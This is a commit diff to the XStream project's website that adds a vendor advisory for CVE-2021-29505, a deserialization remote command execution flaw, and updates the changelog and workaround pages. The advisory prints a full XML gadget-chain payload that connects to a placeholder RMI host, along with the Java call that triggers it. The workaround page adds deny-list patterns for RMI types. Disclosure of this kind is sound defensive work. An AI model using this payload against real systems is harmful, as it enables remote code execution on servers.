Add description of CVE-2021-29505 and bug fix.

xstream-distribution/src/content/CVE-2021-29505.html

@@ -0,0 +1,119 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+ 
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+ 
+ Created on 8. May 2021 by Joerg Schaible
+ -->
+  <head>
+    <title>CVE-2021-29505</title>
+  </head>
+  <body>
+
+    <h2 id="vulnerability">Vulnerability</h2>
+
+    <p>CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack.</p>
+
+    <h2 id="affected_versions">Affected Versions</h2>
+
+	<p>All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is
+	affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+	framework</a> with a whitelist limited to the minimal required types.</p>
+
+    <h2 id="description">Description</h2>
+
+    <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+    XStream creates therefore new instances based on these type information.  An attacker can manipulate the processed
+    input stream and replace or inject objects, that result in execution of a local command on the server.</p>
+
+    <h2 id="reproduction">Steps to Reproduce</h2>
+
+	<p>Create a simple PriorityQueue and use XStream to marshal it to XML.  Replace the XML with following snippet and
+	unmarshal it again with XStream:</p>
+<div class="Source XML"><pre>&lt;java.util.PriorityQueue serialization='custom'&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+      &lt;type&gt;12345&lt;/type&gt;
+      &lt;value class='com.sun.org.apache.xpath.internal.objects.XString'&gt;
+        &lt;m__obj class='string'&gt;com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &lt;none&gt;&lt;/m__obj&gt;
+      &lt;/value&gt;
+    &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+      &lt;type&gt;12345&lt;/type&gt;
+      &lt;value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'&gt;
+        &lt;message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'&gt;
+          &lt;parsedMessage&gt;true&lt;/parsedMessage&gt;
+          &lt;soapVersion&gt;SOAP_11&lt;/soapVersion&gt;
+          &lt;bodyParts/&gt;
+          &lt;sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'&gt;
+            &lt;attachmentsInitialized&gt;false&lt;/attachmentsInitialized&gt;
+            &lt;multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'&gt;
+              &lt;soapPart/&gt;
+              &lt;mm&gt;
+                &lt;it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'&gt;
+                  &lt;aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'&gt;
+                    &lt;candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'&gt;
+                      &lt;names&gt;
+                        &lt;string&gt;aa&lt;/string&gt;
+                        &lt;string&gt;aa&lt;/string&gt;
+                      &lt;/names&gt;
+                      &lt;ctx&gt;
+                        &lt;environment/&gt;
+                        &lt;registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'&gt;
+                          &lt;java.rmi.server.RemoteObject&gt;
+                            &lt;string&gt;UnicastRef&lt;/string&gt;
+                            &lt;string&gt;ip2&lt;/string&gt;
+                            &lt;int&gt;1099&lt;/int&gt;
+                            &lt;long&gt;0&lt;/long&gt;
+                            &lt;int&gt;0&lt;/int&gt;
+                            &lt;short&gt;0&lt;/short&gt;
+                            &lt;boolean&gt;false&lt;/boolean&gt;
+                          &lt;/java.rmi.server.RemoteObject&gt;
+                        &lt;/registry&gt;
+                        &lt;host&gt;ip2&lt;/host&gt;
+                        &lt;port&gt;1099&lt;/port&gt;
+                      &lt;/ctx&gt;
+                    &lt;/candidates&gt;
+                  &lt;/aliases&gt;
+                &lt;/it&gt;
+              &lt;/mm&gt;
+            &lt;/multiPart&gt;
+          &lt;/sm&gt;
+        &lt;/message&gt;
+      &lt;/value&gt;
+    &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+    <p>As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.</p>
+
+    <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+    <h2 id="impact">Impact</h2>
+
+	<p>The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by
+	manipulating the processed input stream.</p>
+
+    <h2 id="workarounds">Workarounds</h2>
+
+    <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+    <h2 id="credits">Credits</h2>
+
+    <p>V3geB1rd, white hat hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+  	</body>
+ </html>

xstream-distribution/src/content/changes.html

@@ -101,11 +101,26 @@ <h2>Stream compatibility</h2>
 		<li>No support for Hibernate 3 collections.</li>
 	</ul>
 
-<!--
 	<h1 id="upcoming-1.4.x">Upcoming 1.4.x maintenance release</h1>
 
 	<p>Not yet released.</p>
--->
+
+	<p class="highlight">This maintenance release addresses the security vulnerability
+	<a href="CVE-2020-26258.html">CVE-2021-29505</a>, when unmarshalling with XStream instances using an uninitialized
+	security framework.</p>
+
+	<h2>Stream compatibility</h2>
+
+	<ul>
+		<li>The following types are now blacklisted by default and the deserialization
+		of XML containing one of the two types will fail.  You will have to enable these types by explicit
+		configuration, if you need them:<br>
+			<ul>
+				<li>any type in the java.rmi.* and sun.rmi.* package hierarchies</li>
+				<li>the individual type com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl</li>
+			</ul>
+		</li>
+	</ul>
 
 	<h1 id="1.4.16">1.4.16</h1>
 

xstream-distribution/src/content/security.html

@@ -44,11 +44,20 @@ <h2 id="CVEs">Documented Vulnerabilities</h2>
     Exposure (CVE) system managed by the <a href="http://www.mitre.org/">Mitre Corporation</a>. Following a list of the
     reported vulnerabilities for the different versions:</p>
 
-    <table summary="Table of reported vulnerabilities daocumented as CVE">
+    <table summary="Table of reported vulnerabilities documented as CVE">
       <tr>
         <th>CVE</th>
         <th>Description</th>
       </tr>
+      <tr>
+        <th>Version 1.4.16</th>
+        <td></td>
+        <td></td>
+      </tr>
+      <tr>
+        <th><a href="CVE-2021-29505.html">CVE-2021-29505</a></th>
+        <td>XStream is vulnerable to a Remote Command Execution attack.</td>
+      </tr>
       <tr>
         <th>Version 1.4.15</th>
         <td></td>
@@ -393,16 +402,19 @@ <h2 id="workaround">Workarounds for older XStream versions</h2>
 <div class="Source Java"><pre>XStream xstream = new XStream();
 // add your allowed types, type hierarchies or packages here
 </pre></div>
-    <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can
+    <p>Users of XStream 1.4.16 who insist to use XStream default blacklist - despite that clear recommendation - can
     add these lines to XStream's setup code:</p>
+<div class="Source Java"><pre>xstream.denyTypesByRegExp(new String[]{ ".*\\.Lazy(?:Search)?Enumeration.*", "(?:java|sun)\\.rmi\\..*" });
+</pre></div>
+    <p>Users of XStream 1.4.15 should <strong>additionally</strong> add these lines to the lines from above:</p>
 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "sun.awt.datatransfer.DataTransferer$IndexOrderComparator", "sun.swing.SwingLazyValue", "com.sun.corba.se.impl.activation.ServerTableEntry", "com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator" });
 xstream.denyTypesByRegExp(new String[]{ ".*\\$ServiceNameIterator", "javafx\\.collections\\.ObservableList\\$.*", ".*\\.bcel\\..*\\.util\\.ClassLoader" });
 xstream.denyTypeHierarchy(java.io.InputStream.class );
 xstream.denyTypeHierarchy(java.nio.channels.Channel.class );
 xstream.denyTypeHierarchy(javax.activation.DataSource.class );
 xstream.denyTypeHierarchy(javax.sql.rowset.BaseRowSet.class );
 </pre></div>
-    <p>Users of XStream 1.4.13 should <strong>additionally</strong> add these two lines to the lines from above:</p>
+    <p>Users of XStream 1.4.14 and 1.4.13 should <strong>additionally</strong> add these two lines to the lines from above:</p>
 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
 </pre></div>

xstream-distribution/src/content/website.xml

@@ -74,6 +74,7 @@
         <page>CVE-2021-21349.html</page>
         <page>CVE-2021-21350.html</page>
         <page>CVE-2021-21351.html</page>
+        <page>CVE-2021-29505.html</page>
         <page>CVE-2020-26217.html</page>
         <page>CVE-2020-26258.html</page>
         <page>CVE-2020-26259.html</page>